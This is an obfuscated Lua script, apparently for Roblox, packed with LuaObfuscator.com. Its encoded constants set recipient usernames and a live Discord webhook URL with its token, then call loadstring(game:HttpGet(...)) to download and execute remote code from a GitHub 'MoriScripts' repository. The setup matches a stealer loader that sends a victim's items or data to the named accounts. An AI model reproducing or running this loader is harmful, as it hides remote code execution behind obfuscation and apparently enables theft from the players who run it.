--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v31)if (v1(v31,2)==79) then local v69=0;while true do if (v69==0) then v20=v0(v3(v31,1,1));return "";end end else local v70=v2(v0(v31,16));if v20 then local v79=v5(v70,v20);v20=nil;return v79;else return v70;end end end);v21=nil;v18=1;end if (v18==2) then function v23()local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v33 * (493 -237)) + v32 ;end v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (7 -4) );v19=v19 + (623 -((1482 -(214 + 713)) + 64)) ;return (v37 * 16777216) + (v36 * (66467 -(857 + 74))) + (v35 * (824 -(367 + 201))) + v34 ;end v25=nil;v18=3;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v38=1194 -(352 + 842) ;local v39;local v40;local v41;local v42;local v43;local v44;while true do local v66=0;while true do if (v66==0) then if ((0 -0)~=v38) then else local v97=1821 -(1483 + 338) ;while true do if (v97==(1697 -(1229 + 466))) then v38=579 -(386 + 192) ;break;end if (v97==0) then v39={};v40={};v97=1;end if (v97~=(1207 -(696 + 510))) then else v41={};v42={v39,v40,nil,v41};v97=2;end end end if (v38==(3 -2)) then local v98=0 -0 ;local v99;while true do if (v98~=0) then else v99=374 -(123 + 251) ;while true do if (2~=v99) then else v38=9 -7 ;break;end if (v99==1) then for v115=1,v43 do local v116=0;local v117;local v118;local v119;local v120;while true do if (v116~=2) then else while true do if ((699 -(208 + 490))~=v117) then else v120=nil;while true do if (v118~=(1 + 0)) then else if (v119==(1 + 0)) then v120=v22()~=0 ;elseif (v119==2) then v120=v25();elseif (v119~=3) then else v120=v26();end v44[v115]=v120;break;end if (v118~=(836 -(660 + 176))) then else local v177=0;local v178;while true do if (v177==(0 + 0)) then v178=202 -(14 + 188) ;while true do if (v178~=(675 -(534 + 141))) then else local v187=0 + 0 ;local v188;while true do if (v187~=0) then else v188=0 + 0 ;while true do if ((0 + 0)==v188) then local v199=0;while true do if (v199==(1 -0)) then v188=1;break;end if (v199==(0 -0)) then v119=v22();v120=nil;v199=2 -1 ;end end end if (1~=v188) then else v178=1 + 0 ;break;end end break;end end end if (v178~=(1 + 0)) then else v118=397 -(115 + 281) ;break;end end break;end end end end break;end if (v117~=0) then else local v173=0 -0 ;local v174;while true do if (0==v173) then v174=0;while true do if (1~=v174) then else v117=1 + 0 ;break;end if (v174~=(0 -0)) then else local v184=0 -0 ;while true do if (v184~=(867 -(550 + 317))) then else v118=0;v119=nil;v184=1 -0 ;end if (1~=v184) then else v174=1 -0 ;break;end end end end break;end end end end break;end if (v116==(0 -0)) then v117=285 -(134 + 151) ;v118=nil;v116=1;end if (v116~=(1666 -(970 + 695))) then else v119=nil;v120=nil;v116=3 -1 ;end end end v42[3]=v22();v99=1992 -(582 + 1408) ;end if (v99==0) then v43=v24();v44={};v99=1;end end break;end end end v66=1;end if (v66~=(3 -2)) then else if ((2 -0)==v38) then local v100=0;while true do if (v100==0) then for v106=1,v24() do local v107=0 -0 ;local v108;local v109;local v110;local v111;while true do if (v107~=2) then else while true do if (v108~=(1824 -(1195 + 629))) then else local v161=0 -0 ;while true do if (v161==0) then v109=0;v110=nil;v161=1;end if (v161==1) then v108=1;break;end end end if (v108==1) then v111=nil;while true do if (v109==(241 -(187 + 54))) then local v175=0;while true do if (0~=v175) then else v110=0;v111=nil;v175=781 -(162 + 618) ;end if (v175~=(1 + 0)) then else v109=1 + 0 ;break;end end end if (v109==1) then while true do if (v110==0) then v111=v22();if (v21(v111,1 -0 ,1)~=(0 -0)) then else local v179=0 + 0 ;local v180;local v181;local v182;local v183;while true do if (v179~=(1637 -(1373 + 263))) then else local v185=0;while true do if (v185==1) then v179=2;break;end if (v185==(1000 -(451 + 549))) then v182=nil;v183=nil;v185=1 + 0 ;end end end if (v179==(0 -0)) then local v186=0 -0 ;while true do if (v186==0) then v180=1384 -(746 + 638) ;v181=nil;v186=1 + 0 ;end if (v186~=1) then else v179=1 -0 ;break;end end end if (v179==(343 -(218 + 123))) then while true do if (v180~=(1582 -(1535 + 46))) then else local v189=0 + 0 ;while true do if (v189==1) then v180=1 + 1 ;break;end if (v189~=0) then else local v196=0;local v197;while true do if (v196~=(560 -(306 + 254))) then else v197=0 + 0 ;while true do if (v197~=(1 -0)) then else v189=1;break;end if (v197==0) then v183={v23(),v23(),nil,nil};if (v181==0) then local v204=0;local v205;while true do if (v204==0) then v205=0 + 0 ;while true do if (0==v205) then v183[3]=v23();v183[4]=v23();break;end end break;end end elseif (v181==1) then v183[7 -4 ]=v24();elseif (v181==(605 -(268 + 335))) then v183[3]=v24() -(2^(306 -(60 + 230))) ;elseif (v181==(575 -(426 + 146))) then local v210=0;local v211;local v212;while true do if (0~=v210) then else v211=0 + 0 ;v212=nil;v210=1457 -(282 + 1174) ;end if (1==v210) then while true do if (v211~=0) then else v212=811 -(569 + 242) ;while true do if (v212~=(0 -0)) then else v183[3]=v24() -((1 + 1)^(1040 -(706 + 318))) ;v183[1255 -(721 + 530) ]=v23();break;end end break;end end break;end end end v197=1;end end break;end end end end end if (v180==3) then if (v21(v182,1274 -(945 + 326) ,7 -4 )==(1 + 0)) then v183[4]=v44[v183[4]];end v39[v106]=v183;break;end if (v180==(700 -(271 + 429))) then local v191=0 + 0 ;local v192;while true do if (v191==(1500 -(1408 + 92))) then v192=0;while true do if (v192==(1086 -(461 + 625))) then v181=v21(v111,1290 -(993 + 295) ,3);v182=v21(v111,1 + 3 ,1177 -(418 + 753) );v192=1 + 0 ;end if (v192==1) then v180=1;break;end end break;end end end if (v180==(1 + 1)) then local v193=0;while true do if (v193==0) then local v198=0 + 0 ;while true do if (v198~=1) then else v193=1;break;end if (0==v198) then if (v21(v182,1,1 + 0 )~=1) then else v183[2]=v44[v183[2]];end if (v21(v182,531 -(406 + 123) ,2)==(1770 -(1749 + 20))) then v183[1 + 2 ]=v44[v183[3]];end v198=1323 -(1249 + 73) ;end end end if (v193==1) then v180=3;break;end end end end break;end end end break;end end break;end end break;end end break;end if (v107==0) then v108=0 + 0 ;v109=nil;v107=1;end if (v107==(1146 -(466 + 679))) then v110=nil;v111=nil;v107=4 -2 ;end end end for v112=2 -1 ,v24() do v40[v112-(1901 -(106 + 1794)) ]=v29();end v100=1 + 0 ;end if (v100~=1) then else return v42;end end end break;end end end end v18=5;end if (v18==3) then function v25()local v45=0 + 0 ;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v45==(2 -1)) then v48=2 -1 ;v49=(v21(v47,1,(504 -370) -(4 + 110) ) * ((586 -(34 + 23 + 527))^(1459 -(41 + 1386)))) + v46 ;v45=105 -(17 + 55 + 31) ;end if (v45==(2 + 0)) then v50=v21(v47,46 -25 ,89 -58 );v51=((v21(v47,(1048 -(20 + 830)) -(122 + 35 + 9) )==(127 -(116 + 10))) and  -(1 -0)) or (3 -2) ;v45=3 + 0 ;end if (v45==(0 + 0 + 0)) then v46=v24();v47=v24();v45=1;end if (3==v45) then if (v50==0) then if (v49==(0 -(738 -(542 + 196)))) then return v51 * (65 -(30 + 35)) ;else local v101=0 + 0 ;while true do if (v101==(1257 -(1043 + 214))) then v50=3 -(3 -1) ;v48=(354 + 858) -(323 + 889) ;break;end end end elseif (v50==(5509 -(1759 + 1703))) then return ((v49==(580 -(361 + 79 + 140))) and (v51 * ((321 -(53 + 267))/(0 + 0)))) or (v51 * NaN) ;end return v8(v51,v50-(1436 -(15 + 398)) ) * (v48 + (v49/(2^(1034 -(18 + 964))))) ;end end end v26=nil;function v26(v52)local v53;if  not v52 then local v71=0 -0 ;while true do if (v71==(0 -0)) then v52=v24();if (v52==(1121 -(118 + 1003))) then return "";end break;end end end v53=v3(v16,v19,(v19 + v52) -(2 -1) );v19=v19 + v52 ;local v54={};for v67=(7040 -5488) -(1126 + 425) , #v53 do v54[v67]=v2(v1(v3(v53,v67,v67)));end return v6(v54);end v27=v24;v18=4;end if (v18==1) then function v21(v55,v56,v57)if v57 then local v72=0 + 0 ;local v73;while true do if (v72==0) then v73=(v55/((979 -(553 + 424))^(v56-(1 -0))))%((2 + 0)^(((v57-(1 + 0)) -(v56-(1 + 0))) + 1 + 0)) ;return v73-(v73%(1 + 0)) ;end end else local v74=0 + 0 ;local v75;while true do if (v74==(0 -(0 -0))) then v75=2^(v56-1) ;return (((v55%(v75 + v75))>=v75) and ((755 -(239 + 514)) -1)) or (0 -0) ;end end end end v22=nil;function v22()local v58=v1(v16,v19,v19);v19=v19 + 1 ;return v58;end v23=nil;v18=2;end if (v18==5) then v30=nil;function v30(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (v62==1) then v65=v59[3];return function(...)local v80=v63;local v81=v64;local v82=v65;local v83=v28;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v94=0,v88 do if (v94>=v82) then v86[v94-v82 ]=v87[v94 + 1 ];else v90[v94]=v87[v94 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do v92=v80[v84];v93=v92[1];if (v93<=8) then if (v93<=3) then if (v93<=1) then if (v93==0) then local v121=0;local v122;local v123;local v124;local v125;while true do if (v121==2) then for v168=v122,v85 do v125=v125 + 1 ;v90[v168]=v123[v125];end break;end if (v121==0) then v122=v92[2];v123,v124=v83(v90[v122](v13(v90,v122 + 1 ,v92[3])));v121=1;end if (v121==1) then v85=(v124 + v122) -1 ;v125=0;v121=2;end end else v61[v92[3]]=v90[v92[2]];end elseif (v93==2) then if (v92[3]=="_ENV") then v90[v92[2]]=v61;else v90[v92[2]]=v61[v92[3]];end else do return;end end elseif (v93<=5) then if (v93>4) then v90[v92[2]]=v92[3]~=0 ;else local v129=v92[2];local v130,v131=v83(v90[v129](v13(v90,v129 + 1 ,v92[3])));v85=(v131 + v129) -1 ;local v132=0;for v146=v129,v85 do v132=v132 + 1 ;v90[v146]=v130[v132];end end elseif (v93<=6) then v90[v92[2]]();elseif (v93==7) then v90[v92[2]]=v92[3];else v90[v92[2]]=v92[3];end elseif (v93<=12) then if (v93<=10) then if (v93==9) then v90[v92[2]]();else local v133=v92[2];v90[v133]=v90[v133](v13(v90,v133 + 1 ,v85));end elseif (v93==11) then local v135=v92[2];local v136=v90[v92[3]];v90[v135 + 1 ]=v136;v90[v135]=v136[v92[4]];else v90[v92[2]]=v92[3]~=0 ;end elseif (v93<=14) then if (v93==13) then if (v92[3]=="_ENV") then v90[v92[2]]=v61;else v90[v92[2]]=v61[v92[3]];end else v61[v92[3]]=v90[v92[2]];end elseif (v93<=15) then local v143=0;local v144;local v145;while true do if (v143==0) then v144=v92[2];v145=v90[v92[3]];v143=1;end if (v143==1) then v90[v144 + 1 ]=v145;v90[v144]=v145[v92[4]];break;end end elseif (v93>16) then do return;end else local v159=0;local v160;while true do if (v159==0) then v160=v92[2];v90[v160]=v90[v160](v13(v90,v160 + 1 ,v85));break;end end end v84=v84 + 1 ;end end;end if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O0003083O00557365724E616D6503143O0044656174686E6F74656A756C69616E6B692O6C3903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O363236383731383532383038313937322F347265777066696B4E703068326C4F454F716C582O49546B4C64784B597079476733595A6A34493648384A523233702D6C564954374B7A31447A3576706634773577434603093O00557365724E616D6532030B3O0077336E64332O6C6A30686E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F726953637269707473000F3O0012083O00023O00120E3O00013O0012083O00043O00120E3O00033O0012083O00063O00120E3O00053O0012023O00073O001202000100083O00200B0001000100090012080003000A4O0005000400016O000100044O000A5O00022O00063O000100012O00113O00017O00",v9(),...);
